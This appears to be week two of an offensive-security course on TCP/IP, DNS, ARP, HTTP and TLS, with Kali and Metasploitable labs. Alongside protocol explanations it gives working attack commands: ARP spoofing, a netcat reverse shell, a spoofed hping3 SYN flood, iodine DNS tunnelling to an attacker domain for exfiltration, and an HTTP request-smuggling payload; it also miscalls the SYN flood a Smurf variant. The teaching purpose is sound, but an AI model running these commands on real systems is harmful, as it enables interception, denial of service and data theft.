Week 2: TCP/IP Deep Dive

MITRE ATT&CK: Tactic — TA0007 (Discovery), Technique — T1046 (Network Service Scanning)

Real-World Attack Scenario: The Mirai Botnet

The Mirai botnet (2016) infected over 600,000 IoT devices by exploiting TCP/IP protocol weaknesses:

1. Scanning: Infected devices scanned the internet for TCP port 23 (Telnet) and port 2323
2. Protocol Analysis: Found devices using default credentials (admin/admin, root/root)
3. TCP Connection: Established TCP connections to vulnerable devices
4. Credential Brute Force: Used 60 username/password combinations (mostly default IoT creds)
5. Malware Download: Via HTTP/TCP after gaining shell access
6. Botnet Formation: Controlled via C2 using TCP connections

Why this week matters: Mirai exploited fundamental TCP/IP behaviors — the three-way handshake, TCP state management, and the trust implicit in establishing connections. Understanding TCP/IP internals reveals why stopping botnets is harder than it seems.

Objectives

• Master TCP three-way handshake and connection states
• Understand UDP, DNS resolution, and ARP
• Analyze HTTP requests/responses
• Capture and interpret network traffic
• Comprehend how attackers exploit TCP/IP protocol weaknesses

TCP Three-Way Handshake

Normal Connection:
Client          Server
  │               │
  │── SYN ───────▶│    Seq=X
  │◀── SYN-ACK ───│    Seq=Y, Ack=X+1
  │── ACK ───────▶│    Ack=Y+1
  │               │
  │   [Data]      │
  │   [Data]      │
  │   [FIN]       │    Graceful close

Connection States (netstat/ss):

• ESTABLISHED — active connection
• SYN_SENT — sent SYN, waiting for SYN-ACK
• SYN_RECV — received SYN, sent SYN-ACK (server side)
• TIME_WAIT — waiting for delayed packets
• CLOSE_WAIT — passive close received, waiting close

TCP Flags

URG  - Urgent pointer
ACK  - Acknowledgment
PSH  - Push data to application
RST  - Reset connection
SYN  - Synchronize sequence numbers
FIN  - Finish connection

UDP (Connectionless)

Client          Server
  │               │
  │── Data ──────▶│    No handshake
  │               │    No ack, no retransmit
  │── Data ──────▶│    Fire and forget

UDP is used by: DNS (port 53), DHCP (67/68), SNMP, NTP, VoIP, Gaming, QUIC

Security note: UDP floods are harder to detect (no handshake = less evidence)

DNS (Port 53)

DNS Record Types

Type	Purpose	Example
A	IPv4 address	blog.example.com → 93.184.216.34
AAAA	IPv6 address	blog.example.com → 2606:2800:220:1::
CNAME	Alias	www.example.com → example.com
MX	Mail server	example.com → mail.example.com
NS	Name server	example.com → ns1.example.com
TXT	SPF, DKIM, verification	"v=spf1 include:_spf..."
PTR	Reverse DNS	34.216.184.93.in-addr.arpa → ...

DNS Queries

# Standard lookup
dig example.com A
dig example.com MX
dig @8.8.8.8 example.com A   # Use specific DNS server

# Reverse DNS
dig -x 93.184.216.34

# Zone transfer (if allowed)
dig axfr @ns1.example.com example.com

# Query types
dig any example.com

DNS Security Issues

Zone Transfer (AXFR): Should be restricted to authorized NS only
DNS Poisoning:       Cache pollution via forged responses
DNS Tunneling:      Exfiltrating data via DNS queries
Subdomain Takeover: Abandoned cloud resources point to dead CNAME

ARP (Address Resolution Protocol)

Maps IP → MAC Address (Layer 2)

# View ARP table
arp -a
ip neigh show

# How it works:
# 1. Host needs MAC for IP, checks ARP cache
# 2. Not found → broadcasts ARP Request
# 3. Owner of IP responds with ARP Reply
# 4. Cached for future use

ARP Attack (Layer 2 MITM)

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP spoof (ettercap or arpspoof)
arpspoof -i eth0 -t 10.0.0.5 10.0.0.1
ettercap -T -M arp:remote /10.0.0.5// /10.0.0.1//

HTTP/HTTPS Analysis

HTTP Request Anatomy

GET /index.html HTTP/1.1\r\n
Host: example.com\r\n
User-Agent: Mozilla/5.0\r\n
Accept: text/html\r\n
\r\n

HTTP Response Anatomy

HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
Content-Length: 1234\r\n
Set-Cookie: session=abc123\r\n
\r\n
<html>...</html>

Capturing HTTP Traffic

# With tcpdump
tcpdump -i eth0 -n -A 'tcp port 80 and host 10.0.0.5'

# With Wireshark
# Filter: http.request or http.response

# Reconstruct HTTP session
follow-tcp-stream (Wireshark menu)

HTTPS (TLS) Breakdown

1. Client → Server: ClientHello (TLS version, cipher suites)
2. Server → Client: ServerHello, Certificate, ServerKeyExchange
3. Client → Server: ClientKeyExchange, ChangeCipherSpec
4. Finished messages from both sides
5. Application data (encrypted)

Security note: With access to the private key, you can decrypt TLS traffic (Wireshark can decrypt if key is provided)

Real Traffic Analysis

Analyze Metasploitable Traffic

# Start capturing on Kali
tcpdump -i eth0 -n -w week2_capture.pcap host 10.0.0.5 &

# From another terminal, trigger traffic
ssh msfadmin@10.0.0.5
ftp localhost
curl http://10.0.0.5/

# Stop capture
^C

# Analyze in Wireshark
wireshark week2_capture.pcap

# Filter for specific protocols
tcp.port == 21
tcp.port == 80
dns
http.request.method == "GET"

DHCP (Dynamic Host Configuration Protocol)

UDP Ports 67 (server) / 68 (client)

# DHCP process (DORA):
# Discover → Offer → Request → Ack

# View DHCP info (Windows)
ipconfig /all

# View DHCP leases (Linux)
cat /var/lib/dhcp/dhcpd.leases

Security: Rogue DHCP server attack — attacker responds faster than legitimate server

Practice Labs

Lab 1: TCP Connection Analysis

# Start Wireshark capture
# Open browser, visit http://example.com
# Filter: tcp && ip.addr == <target_ip>
# Observe: SYN → SYN-ACK → ACK → GET → 200 OK → FIN

Lab 2: DNS Enumeration

# Query various record types
dig @10.0.0.5 axfr internal.lab target.com
dig @10.0.0.5 txt _dmarc.example.com

# Use dnsenum for automation
dnsenum target.com
dnsenum -f /usr/share/dnsenum/dns.txt target.com

Lab 3: HTTP Traffic Capture

# On Kali, start Burp Suite
# Configure browser to use 127.0.0.1:8080 proxy
# Visit DVWA on Metasploitable
# Intercept and modify requests

Tools Deep Dive

Netcat (Swiss Army Knife)

# Banner grabbing
nc -nv 10.0.0.5 21
nc -nv 10.0.0.5 80

# Interactive connection
nc -nv 10.0.0.5 443

# Port scanning
nc -nvz 10.0.0.5 1-1000

# File transfer
nc -l 4444 > file.txt     # Receiver
nc 10.0.0.5 4444 < file.txt  # Sender

# Reverse shell
nc -lvp 4444                    # Listener
nc 10.0.0.4 4444 -e /bin/bash   # Sender (Linux target)

cURL (HTTP Client)

# Basic request
curl -v http://example.com

# Custom headers
curl -H "User-Agent: Mozilla" -H "X-Custom: value" http://example.com

# POST data
curl -X POST -d "user=admin&pass=secret" http://example.com/login

# Save response
curl -o output.html http://example.com

# Follow redirects
curl -L http://example.com

# With authentication
curl -u username:password http://example.com/protected

# JSON API
curl -X POST -H "Content-Type: application/json" \
  -d '{"user":"admin"}' https://api.example.com

Key Takeaways

1. TCP states and flags — understand ESTABLISHED, TIME_WAIT, and SYN floods. Attackers exploit state transitions to evade detection or exhaust resources.
2. DNS — A, AAAA, CNAME, MX records; zone transfer risks. DNS is the foundation of internet navigation and a primary target for attackers.
3. ARP — maps IP to MAC; ARP spoofing enables MITM. Without ARP security, any host on the subnet can intercept traffic.
4. HTTP — request/response structure, header manipulation. Most web vulnerabilities exploit HTTP semantics.
5. TLS — handshake process; without keys, traffic is opaque. But compromised keys or certificates break TLS protection entirely.
6. Real-world protocol attacks: SYN floods exploit TCP's half-open state, DNS poisoning corrupts resolver caches, ARP spoofing creates invisible MITM positions.

Real-World Attack: SYN Flood (Smurf Attack Variant)

A real-world example of TCP state exploitation is the Mirai botnet's DDoS technique:

# Simplified SYN flood demonstration
# Attacker sends SYN to target with spoofed source IP
hping3 -S -a FAKE_SOURCE_IP --flood TARGET_IP

# Target responds with SYN-ACK to fake IP
# But the fake IP never responds with ACK
# Connection remains half-open, consuming resources

# Modern DDoS protection requires:
# - SYN cookies (doesn't reserve resources until final ACK)
# - Rate limiting at network perimeter
# - Anycast/ CDN distribution

Real-World Attack: DNS Tunneling

DNS tunneling exploits the fact that DNS queries must pass through network firewalls:

# Scenario: Exfiltrating data via DNS queries
# Attacker controls DNS server for attacker.com

# Installing tunneling tool on compromised host
apt install iodine
iodined -f 10.0.0.1 tunnel.attacker.com

# Now all traffic can be encoded in DNS queries
# Instead of HTTP to exfil.txt, send encoded DNS queries:
# subdomain=data_base64_encoded.attacker.com

# DNS resolver passes these to attacker.com nameserver
# Attacker resolves and decodes the subdomain data
# Bypasses firewall restrictions on outbound HTTP

Real-World Attack: HTTP Desync (HTTP Desync Attack)

Modern web servers share connections between users via connection reuse, enabling HTTP desync attacks:

# HTTP/1.1 request smuggling
# Content-Length tells server message length
# Transfer-Encoding: chunked is alternative method

# Smuggled request:
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0
\r\n
GET /admin HTTP/1.1
X: X

# Front-end server sees:
# POST / (Content-Length: 6, reads 6 bytes: "0\r\n\r\n")
#
# Back-end server sees (after connection reuse):
# GET /admin HTTP/1.1  <-- smuggled request
# X: X
#
# The smuggled request bypasses front-end controls
# because it was hidden in the POST body

Next Week Preview

Week 3 shifts to Linux for Hackers — you'll live in the command line, write bash scripts, understand file permissions, processes, and system administration basics. Every professional security tool (nmap, metasploit, Burp Suite) runs on Linux. By the end of Week 3, you'll navigate Linux as fluently as Windows and understand why attackers target world-writable cron scripts and SUID binaries.